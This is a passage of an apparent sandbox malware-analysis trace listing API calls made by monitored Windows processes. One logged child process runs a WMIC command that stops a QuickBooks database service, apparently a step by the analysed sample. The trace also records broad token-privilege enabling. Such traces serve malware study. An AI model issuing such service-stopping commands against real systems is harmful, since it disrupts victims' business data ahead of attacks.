lpUsedDefaultChar=0x0) returned 28 [0302.064] malloc (_Size=0x1c) returned 0x34eb9b8 [0302.065] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x34eb9b8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0302.065] __iob_func () returned 0x776f2608 [0302.065] fprintf (in: _File=0x776f2628, _Format="%s" | out: _File=0x776f2628) returned 27 [0302.065] __iob_func () returned 0x776f2608 [0302.065] fflush (in: _File=0x776f2628 | out: _File=0x776f2628) returned 0 [0302.066] free (_Block=0x34eb9b8) [0302.066] free (_Block=0x34ec0c0) [0302.066] ??1CHString@@QAE@XZ () returned 0x1 [0302.066] WbemLocator:IUnknown:Release (This=0x3580f78) returned 0x0 [0302.067] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0302.067] _kbhit () returned 0x0 [0302.071] free (_Block=0x34e2ee8) [0302.071] free (_Block=0x34ead50) [0302.071] free (_Block=0x34eade0) [0302.071] free (_Block=0x34eac90) [0302.071] free (_Block=0x34eac78) [0302.071] free (_Block=0x34eb058) [0302.071] free (_Block=0x34eb188) [0302.071] free (_Block=0x34e9da8) [0302.071] free (_Block=0x34eb208) [0302.071] free (_Block=0x34ead08) [0302.072] free (_Block=0x34e29c0) [0302.072] free (_Block=0x34e0520) [0302.072] free (_Block=0x34ebc88) [0302.072] free (_Block=0x34eab70) [0302.072] free (_Block=0x34eaed0) [0302.072] free (_Block=0x34ebc48) [0302.072] free (_Block=0x34ebc08) [0302.072] free (_Block=0x34eaeb8) [0302.072] free (_Block=0x34eae40) [0302.072] free (_Block=0x34eae28) [0302.072] free (_Block=0x34ebbd8) [0302.072] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0302.072] free (_Block=0x34eb0f0) [0302.072] free (_Block=0x34eaca8) [0302.072] free (_Block=0x34e0568) [0302.072] free (_Block=0x34eab10) [0302.072] free (_Block=0x34eb1c8) [0302.072] free (_Block=0x34eab28) [0302.072] free (_Block=0x34e2ca0) [0302.072] free (_Block=0x34e26b0) [0302.072] free (_Block=0x34e26f8) [0302.072] free (_Block=0x34e2740) [0302.073] free (_Block=0x34eaea0) [0302.073] free (_Block=0x34e27c8) [0302.073] free (_Block=0x34e0508) [0302.073] free (_Block=0x34e2d60) [0302.073] free (_Block=0x34e04f0) [0302.073] free (_Block=0x34e2a00) [0302.073] free (_Block=0x34e04d8) [0302.073] free (_Block=0x34e2a60) [0302.073] free (_Block=0x34e2908) [0302.073] free (_Block=0x34e2920) [0302.073] free (_Block=0x34e28d0) [0302.073] free (_Block=0x34e28e8) [0302.073] free (_Block=0x34e2940) [0302.073] free (_Block=0x34e2958) [0302.073] free (_Block=0x34e04a0) [0302.073] free (_Block=0x34e04b8) [0302.073] free (_Block=0x34e2860) [0302.073] free (_Block=0x34e2878) [0302.073] free (_Block=0x34e2828) [0302.073] free (_Block=0x34e2840) [0302.073] free (_Block=0x34e2898) [0302.073] free (_Block=0x34e28b0) [0302.073] free (_Block=0x34e27f0) [0302.073] free (_Block=0x34e2808) [0302.073] free (_Block=0x34e27a0) [0302.073] free (_Block=0x34e1200) [0302.074] free (_Block=0x34eafd0) [0302.074] WbemLocator:IUnknown:Release (This=0x35248f0) returned 0x2 [0302.074] WbemLocator:IUnknown:Release (This=0x352ad70) returned 0x0 [0302.074] WbemLocator:IUnknown:Release (This=0x35248f0) returned 0x1 [0302.074] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0302.074] WbemLocator:IUnknown:Release (This=0x35248f0) returned 0x0 [0302.074] free (_Block=0x34eab88) [0302.074] free (_Block=0x34eacf0) [0302.074] free (_Block=0x34e2c00) [0302.075] free (_Block=0x34eac60) [0302.075] free (_Block=0x34eadc8) [0302.075] free (_Block=0x34e2c60) [0302.075] free (_Block=0x34ead68) [0302.075] free (_Block=0x34eac30) [0302.075] free (_Block=0x34e2d40) [0302.075] free (_Block=0x34ead80) [0302.075] free (_Block=0x34eabe8) [0302.075] free (_Block=0x34e2b60) [0302.075] free (_Block=0x34eacd8) [0302.075] free (_Block=0x34eabb8) [0302.075] free (_Block=0x34e2a40) [0302.075] free (_Block=0x34ead38) [0302.075] free (_Block=0x34eabd0) [0302.075] free (_Block=0x34e2b40) [0302.075] free (_Block=0x34eacc0) [0302.075] free (_Block=0x34ead98) [0302.075] free (_Block=0x34e2bc0) [0302.075] free (_Block=0x34eac48) [0302.075] free (_Block=0x34eab58) [0302.075] free (_Block=0x34e2be0) [0302.075] free (_Block=0x34e9880) [0302.076] free (_Block=0x34eaba0) [0302.076] free (_Block=0x34e2c40) [0302.076] free (_Block=0x34ead20) [0302.076] free (_Block=0x34eab40) [0302.076] free (_Block=0x34e2b20) [0302.076] free (_Block=0x34eadf8) [0302.076] free (_Block=0x34eadb0) [0302.076] free (_Block=0x34e2b80) [0302.076] free (_Block=0x34eac00) [0302.076] free (_Block=0x34eac18) [0302.076] free (_Block=0x34e29e0) [0302.076] free (_Block=0x34e98f8) [0302.076] free (_Block=0x34e9970) [0302.076] free (_Block=0x34e2c20) [0302.076] free (_Block=0x34e9910) [0302.076] free (_Block=0x34e9808) [0302.076] free (_Block=0x34e2ba0) [0302.076] free (_Block=0x34e9898) [0302.077] free (_Block=0x34e97f0) [0302.077] free (_Block=0x34e2a20) [0302.077] free (_Block=0x34e9988) [0302.077] free (_Block=0x34e9850) [0302.077] free (_Block=0x34e2a80) [0302.077] free (_Block=0x34e99b8) [0302.077] free (_Block=0x34e9820) [0302.077] free (_Block=0x34e2ae0) [0302.077] free (_Block=0x34e9928) [0302.077] free (_Block=0x34e9958) [0302.077] free (_Block=0x34e2aa0) [0302.077] free (_Block=0x34e99a0) [0302.077] free (_Block=0x34e9940) [0302.077] free (_Block=0x34e2d20) [0302.077] free (_Block=0x34e98e0) [0302.077] free (_Block=0x34e98b0) [0302.077] free (_Block=0x34e2ac0) [0302.077] free (_Block=0x34e9838) [0302.078] free (_Block=0x34e9868) [0302.078] free (_Block=0x34e2b00) [0302.078] CoUninitialize () [0302.131] exit (_Code=0) [0302.131] free (_Block=0x34eaee8) [0302.131] free (_Block=0x34e1008) [0302.131] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0302.131] free (_Block=0x34e2e10) [0302.131] free (_Block=0x34e27e0) [0302.131] free (_Block=0x34e0fe8) [0302.131] free (_Block=0x34e0fc8) [0302.131] free (_Block=0x34e0f98) [0302.132] free (_Block=0x34e0f78) [0302.132] free (_Block=0x34e0f48) [0302.132] free (_Block=0x34e0f08) [0302.132] free (_Block=0x34e0ee8) [0302.132] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0302.132] free (_Block=0x34e29a0) Thread: id = 288 os_tid = 0x1034 Thread: id = 289 os_tid = 0x1018 Thread: id = 290 os_tid = 0xf2c Thread: id = 291 os_tid = 0x524 Process: id = "27" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0xc9b1000" os_pid = "0xc48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x13b8" cmd_line = "\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%QuickBooksDB%%'\" call stopservice" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 296 os_tid = 0xfac [0302.495] GetModuleHandleA (lpModuleName=0x0) returned 0xa20000 [0302.495] __set_app_type (_Type=0x1) [0302.495] __p__fmode () returned 0x776f3c14 [0302.495] __p__commode () returned 0x776f49ec [0302.496] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa59af0) returned 0x0 [0302.496] __wgetmainargs (in: _Argc=0xa681a8, _Argv=0xa681ac, _Env=0xa681b0, _DoWildCard=0, _StartInfo=0xa681bc | out: _Argc=0xa681a8, _Argv=0xa681ac, _Env=0xa681b0) returned 0 [0302.496] ??0CHString@@QAE@XZ () returned 0xa685ec [0302.496] malloc (_Size=0x18) returned 0x2f20ef0 [0302.496] malloc (_Size=0x38) returned 0x2f20f10 [0302.496] malloc (_Size=0x28) returned 0x2f20f50 [0302.496] malloc (_Size=0x18) returned 0x2f20f80 [0302.496] malloc (_Size=0x24) returned 0x2f20fa0 [0302.497] malloc (_Size=0x18) returned 0x2f20fd0 [0302.497] malloc (_Size=0x18) returned 0x2f20ff0 [0302.497] ??0CHString@@QAE@XZ () returned 0xa688fc [0302.497] malloc (_Size=0x18) returned 0x2f21010 [0302.497] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0302.497] SetConsoleCtrlHandler (HandlerRoutine=0xa53cc0, Add=1) returned 1 [0302.497] _onexit (_Func=0xa5f370) returned 0xa5f370 [0302.497] _onexit (_Func=0xa5f380) returned 0xa5f380 [0302.497] _onexit (_Func=0xa5f390) returned 0xa5f390 [0302.497] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0302.497] ResolveDelayLoadedAPI () returned 0x74a22590 [0302.498] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0302.505] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0302.513] CoCreateInstance (in: rclsid=0xa26a74*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa26a84*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xa68510 | out: ppv=0xa68510*=0x2f648a0) returned 0x0 [0302.538] GetCurrentProcess () returned 0xffffffff [0302.538] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x97f924 | out: TokenHandle=0x97f924*=0x194) returned 1 [0302.538] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x97f920 | out: TokenInformation=0x0, ReturnLength=0x97f920) returned 0 [0302.538] malloc (_Size=0x118) returned 0x2f226b0 [0302.538] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x3, TokenInformation=0x2f226b0, TokenInformationLength=0x118, ReturnLength=0x97f920 | out: TokenInformation=0x2f226b0, ReturnLength=0x97f920) returned 1 [0302.538] AdjustTokenPrivileges (in: TokenHandle=0x194, DisableAllPrivileges=0, NewState=0x2f226b0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0302.538] free (_Block=0x2f226b0) [0302.538] CloseHandle (hObject=0x194) returned 1 [0302.538] malloc (_Size=0x40) returned 0x2f226b0 [0302.538] malloc (_Size=0x40) returned 0x2f226f8 [0302.538] malloc (_Size=0x40) returned 0x2f22740 [0302.538] SetThreadUILanguage (LangId=0x0) returned 0x2d40409 [0302.551] _vsnwprintf (in: _Buffer=0x2f22740, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x97f8ac | out: _Buffer="ms_409") returned 6 [0302.553] malloc (_Size=0x20) returned 0x2f22788 [0302.553] GetComputerNameW (in: lpBuffer=0x2f22788, nSize=0x97f910 | out: lpBuffer="NQDPDE", nSize=0x97f910) returned 1 [0302.553] lstrlenW (lpString="NQDPDE") returned 6 [0302.553] malloc (_Size=0xe) returned 0x2f21208 [0302.553] lstrlenW (lpString="NQDPDE") returned 6 [0302.553] ResolveDelayLoadedAPI () returned 0x7444db00 [0302.553] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x97f924 | out: lpNameBuffer=0x0, nSize=0x97f924) returned 0x2d45000 [0302.556] GetLastError () returned 0xea [0302.556] malloc (_Size=0x1e) returned 0x2f227b0 [0302.556] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2f227b0, nSize=0x97f924 | out: lpNameBuffer="NQDPDE\\FD1HVy", nSize=0x97f924) returned 0x1 [0302.558] lstrlenW (lpString="") returned 0 [0302.558] lstrlenW (lpString="NQDPDE") returned 6 [0302.558] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0302.561] lstrlenW (lpString=".") returned 1 [0302.561] lstrlenW (lpString="NQDPDE") returned 6 [0302.561] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2=".", cchCount2=1) returned 3 [0302.561] lstrlenW (lpString="LOCALHOST") returned 9 [0302.561] lstrlenW (lpString="NQDPDE") returned 6 [0302.561] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="LOCALHOST", cchCount2=9) returned 3 [0302.561] lstrlenW (lpString="NQDPDE") returned 6 [0302.561] lstrlenW (lpString="NQDPDE") returned 6 [0302.561] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="NQDPDE", cchCount2=6) returned 2 [0302.561] free (_Block=0x2f21208) [0302.561] lstrlenW (lpString="NQDPDE") returned 6 [0302.562] malloc (_Size=0xe) returned 0x2f21208 [0302.562] lstrlenW (lpString="NQDPDE") returned 6 [0302.562] lstrlenW (lpString="NQDPDE") returned 6 [0302.562] malloc (_Size=0xe) returned 0x2f227d8 [0302.562] lstrlenW (lpString="NQDPDE") returned 6 [0302.562] malloc (_Size=0x4) returned 0x2f227f0 [0302.562] malloc (_Size=0xc) returned 0x2f22800 [0302.562] ResolveDelayLoadedAPI () returned 0x7745b870 [0302.575] malloc (_Size=0x18) returned 0x2f22818 [0302.576] malloc (_Size=0xc) returned 0x2f22838 [0302.576] SysStringLen (param_1="IDENTIFY") returned 0x8 [0302.576] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0302.576] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0302.576] SysStringLen (param_1="IDENTIFY") returned 0x8 [0302.576] malloc (_Size=0x18) returned 0x2f22850 [0302.576] malloc (_Size=0xc) returned 0x2f22870 [0302.576] SysStringLen (param_1="IMPERSONATE") returned 0xb [0302.576] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0302.576] SysStringLen (param_1="IMPERSONATE") returned 0xb [0302.576] SysStringLen (param_1="IDENTIFY") returned 0x8 [0302.576] SysStringLen (param_1="IDENTIFY") returned 0x8 [0302.576] SysStringLen (param_1="IMPERSONATE") returned 0xb [0302.576] malloc (_Size=0x18) returned 0x2f22888 [0302.576] malloc (_Size=0xc) returned 0x2f228a8 [0302.576] SysStringLen (param_1="DELEGATE") returned 0x8 [0302.576] SysStringLen (param_1="IDENTIFY") returned 0x8 [0302.576] SysStringLen (param_1="DELEGATE") returned 0x8 [0302.576] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0302.576] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0302.576] SysStringLen (param_1="DELEGATE") returned 0x8 [0302.576] malloc (_Size=0x18) returned 0x2f228c0 [0302.576] malloc (_Size=0xc) returned 0x2f228e0 [0302.576] malloc (_Size=0x18) returned 0x2f228f8 [0302.576] malloc (_Size=0xc) returned 0x2f22918 [0302.577] SysStringLen (param_1="NONE") returned 0x4 [0302.577] SysStringLen (param_1="DEFAULT") returned 0x7 [0302.577] SysStringLen (param_1="DEFAULT") returned 0x7 [0302.577] SysStringLen (param_1="NONE") returned 0x4 [0302.577] malloc (_Size=0x18) returned 0x2f22930 [0302.577] malloc (_Size=0xc) returned 0x2f22950 [0302.577] SysStringLen (param_1="CONNECT") returned 0x7 [0302.577] SysStringLen (param_1="DEFAULT") returned 0x7 [0302.577] malloc (_Size=0x18) returned 0x2f22968 [0302.577] malloc (_Size=0xc) returned 0x2f22988 [0302.577] SysStringLen (param_1="CALL") returned 0x4 [0302.577] SysStringLen (param_1="DEFAULT") returned 0x7 [0302.577] SysStringLen (param_1="CALL") returned 0x4 [0302.577] SysStringLen (param_1="CONNECT") returned 0x7 [0302.577] malloc (_Size=0x18) returned 0x2f229a0 [0302.577] malloc (_Size=0xc) returned 0x2f204a0 [0302.578] SysStringLen (param_1="PKT") returned 0x3 [0302.578] SysStringLen (param_1="DEFAULT") returned 0x7 [0302.578] SysStringLen (param_1="PKT") returned 0x3 [0302.578] SysStringLen (param_1="NONE") returned 0x4 [0302.578] SysStringLen (param_1="NONE") returned 0x4 [0302.578] SysStringLen (param_1="PKT") returned 0x3 [0302.578] malloc (_Size=0x18) returned 0x2f204b8 [0302.578] malloc (_Size=0xc) returned 0x2f204d8 [0302.578] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0302.578] SysStringLen (param_1="DEFAULT") returned 0x7 [0302.578] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0302.578] SysStringLen (param_1="NONE") returned 0x4 [0302.578] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0302.578] SysStringLen (param_1="PKT") returned 0x3 [0302.578] SysStringLen (param_1="PKT") returned 0x3 [0302.578] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0302.578] malloc (_Size=0x18) returned 0x2f22b68 [0302.579] malloc (_Size=0xc) returned 0x2f204f0 [0302.579] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0302.579] SysStringLen (param_1="DEFAULT") returned 0x7 [0302.579] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0302.579] SysStringLen (param_1="PKT") returned 0x3 [0302.579] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0302.579] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0302.579] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0302.579] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0302.579] malloc (_Size=0x18) returned 0x2f22d28 [0302.579] malloc (_Size=0x40) returned 0x2f20508 [0302.579] malloc (_Size=0x20a) returned 0x2f297c8 [0302.579] GetSystemDirectoryW (in: lpBuffer=0x2f297c8, uSize=0x105 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0302.579] free (_Block=0x2f297c8) [0302.579] malloc (_Size=0xc) returned 0x2f20550 [0302.579] malloc (_Size=0xc) returned 0x2f20568 [0302.579] malloc (_Size=0xc) returned 0x2f29988 [0302.579] SysStringLen (param_1="C:\\WINDOWS\\system32") returned 0x13 [0302.579] SysStringLen (param_1="\\wbem\\") returned 0x6 [0302.580] free (_Block=0x2f20550) [0302.580] free (_Block=0x2f20568) [0302.580] SysStringByteLen (bstr="C:\\WINDOWS\\system32\\wbem\\") returned 0x32 [0302.580] free (_Block=0x2f29988) [0302.580] malloc (_Size=0xc) returned 0x2f29868 [0302.580] malloc (_Size=0xc) returned 0x2f29958 [0302.580] malloc (_Size=0xc) returned 0x2f297f0 [0302.580] SysStringLen (param_1="C:\\WINDOWS\\system32\\wbem\\") returned 0x19 [0302.580] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0302.580] free (_Block=0x2f29868) [0302.580] free (_Block=0x2f29958) [0302.580] GetCurrentThreadId () returned 0xfac [0302.580] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x97f434 | out: phkResult=0x97f434*=0x1a0) returned 0x0 [0302.581] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x97f440, lpcbData=0x97f43c*=0x400 | out: lpType=0x0, lpData=0x97f440*=0x30, lpcbData=0x97f43c*=0x4) returned 0x0 [0302.581] _wcsicmp (_String1="0", _String2="1") returned -1 [0302.581] _wcsicmp (_String1="0", _String2="2") returned -2 [0302.581] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x97f43c*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x97f43c*=0x42) returned 0x0 [0302.581] malloc (_Size=0x86) returned 0x2f22dc8 [0302.581] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x2f22dc8, lpcbData=0x97f43c*=0x42 | out: lpType=0x0, lpData=0x2f22dc8*=0x25, lpcbData=0x97f43c*=0x42) returned 0x0 [0302.581] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0302.581] malloc (_Size=0x42) returned 0x2f20550 [0302.581] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0302.581] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x97f440, lpcbData=0x97f43c*=0x400 | out: lpType=0x0, lpData=0x97f440*=0x36, lpcbData=0x97f43c*=0xc) returned 0x0 [0302.581] _wtol (_String="65536") returned 65536 [0302.581] free (_Block=0x2f22dc8) [0302.581] RegCloseKey (hKey=0x0) returned 0x6 [0302.581] CoCreateInstance (in: rclsid=0xa26ad4*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa26ae4*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x97f8d0 | out: ppv=0x97f8d0*=0x2ee45a8) returned 0x0 [0302.600] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x2ee45a8, xmlSource=0x97f854*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\WINDOWS\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x97f8bc | out: isSuccessful=0x97f8bc*=0xffff) returned 0x0 [0302.758] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x2ee45a8, DOMElement=0x97f8cc | out: DOMElement=0x97f8cc*=0x2ee6b48) returned 0x0 [0302.758] malloc (_Size=0xc) returned 0x2f29970 [0302.759] IXMLDOMElement:getElementsByTagName (in: This=0x2ee6b48, tagName="XSLFORMAT", resultList=0x97f8c8 | out: resultList=0x97f8c8*=0x2ee9ca0) returned 0x0 [0302.759] free (_Block=0x2f29970) [0302.759] IXMLDOMNodeList:get_length (in: This=0x2ee9ca0, listLength=0x97f8c4 | out: listLength=0x97f8c4*=21) returned 0x0 [0302.760] IXMLDOMNodeList:get_item (in: This=0x2ee9ca0, index=0, listItem=0x97f8e4 | out: listItem=0x97f8e4*=0x2ee6b88) returned 0x0 [0302.760] IXMLDOMNode:get_text (in: This=0x2ee6b88, text=0x97f8e8 | out: text=0x97f8e8*="texttable.xsl") returned 0x0 [0302.760] IXMLDOMNode:get_attributes (in: This=0x2ee6b88, attributeMap=0x97f8e0 | out: attributeMap=0x97f8e0*=0x2ee9fa8) returned 0x0 [0302.760] malloc (_Size=0xc) returned 0x2f29988 [0302.760] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ee9fa8, name="KEYWORD", namedItem=0x97f8dc | out: namedItem=0x97f8dc*=0x2ee9ff8) returned 0x0 [0302.760] free (_Block=0x2f29988) [0302.761] IXMLDOMNode:get_nodeValue (in: This=0x2ee9ff8, value=0x97f89c | out: value=0x97f89c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x0)) returned 0x0 [0302.761] malloc (_Size=0xc) returned 0x2f29910 [0302.761] malloc (_Size=0xc) returned 0x2f29868 [0302.761] malloc (_Size=0x18) returned 0x2f22d08 [0302.761] IUnknown:Release (This=0x2ee6b88) returned 0x0 [0302.761] IUnknown:Release (This=0x2ee9fa8) returned 0x0 [0302.761] IUnknown:Release (This=0x2ee9ff8) returned 0x0 [0302.761] IXMLDOMNodeList:get_item (in: This=0x2ee9ca0, index=1, listItem=0x97f8e4 | out: listItem=0x97f8e4*=0x2ee6b88) returned 0x0 [0302.761] IXMLDOMNode:get_text (in: This=0x2ee6b88, text=0x97f8e8 | out: text=0x97f8e8*="textvaluelist.xsl") returned 0x0 [0302.761] IXMLDOMNode:get_attributes (in: This=0x2ee6b88, attributeMap=0x97f8e0 | out: attributeMap=0x97f8e0*=0x2ee9fa8) returned 0x0 [0302.761] malloc (_Size=0xc) returned 0x2f29820 [0302.761] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ee9fa8, name="KEYWORD", namedItem=0x97f8dc | out: namedItem=0x97f8dc*=0x2ee9ff8) returned 0x0 [0302.761] free (_Block=0x2f29820) [0302.761] IXMLDOMNode:get_nodeValue (in: This=0x2ee9ff8, value=0x97f89c | out: value=0x97f89c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x0)) returned 0x0 [0302.761] malloc (_Size=0xc) returned 0x2f29898 [0302.762] malloc (_Size=0xc) returned 0x2f299b8 [0302.762] SysStringLen (param_1="VALUE") returned 0x5 [0302.762] SysStringLen (param_1="TABLE") returned 0x5 [0302.762] SysStringLen (param_1="TABLE") returned 0x5 [0302.762] SysStringLen (param_1="VALUE") returned 0x5 [0302.762] malloc (_Size=0x18) returned 0x2f22b48 [0302.762] IUnknown:Release (This=0x2ee6b88) returned 0x0 [0302.762] IUnknown:Release (This=0x2ee9fa8) returned 0x0 [0302.762] IUnknown:Release (This=0x2ee9ff8) returned 0x0 [0302.762] IXMLDOMNodeList:get_item (in: This=0x2ee9ca0, index=2, listItem=0x97f8e4 | out: listItem=0x97f8e4*=0x2ee6b88) returned 0x0 [0302.762] IXMLDOMNode:get_text (in: This=0x2ee6b88, text=0x97f8e8 | out: text=0x97f8e8*="textvaluelist.xsl") returned 0x0 [0302.762] IXMLDOMNode:get_attributes (in: This=0x2ee6b88, attributeMap=0x97f8e0 | out: attributeMap=0x97f8e0*=0x2ee9fa8) returned 0x0 [0302.762] malloc (_Size=0xc) returned 0x2f29820 [0302.762] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ee9fa8, name="KEYWORD", namedItem=0x97f8dc | out: namedItem=0x97f8dc*=0x2ee9ff8) returned 0x0 [0302.762] free (_Block=0x2f29820) [0302.762] IXMLDOMNode:get_nodeValue (in: This=0x2ee9ff8, value=0x97f89c | out: value=0x97f89c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x0)) returned 0x0 [0302.762] malloc (_Size=0xc) returned 0x2f29808 [0302.762] malloc (_Size=0xc) returned 0x2f29838 [0302.762] SysStringLen (param_1="LIST") returned 0x4 [0302.762] SysStringLen (param_1="TABLE") returned 0x5 [0302.763] malloc (_Size=0x18) returned 0x2f22b88 [0302.763] IUnknown:Release (This=0x2ee6b88) returned 0x0 [0302.763] IUnknown:Release (This=0x2ee9fa8) returned 0x0 [0302.763] 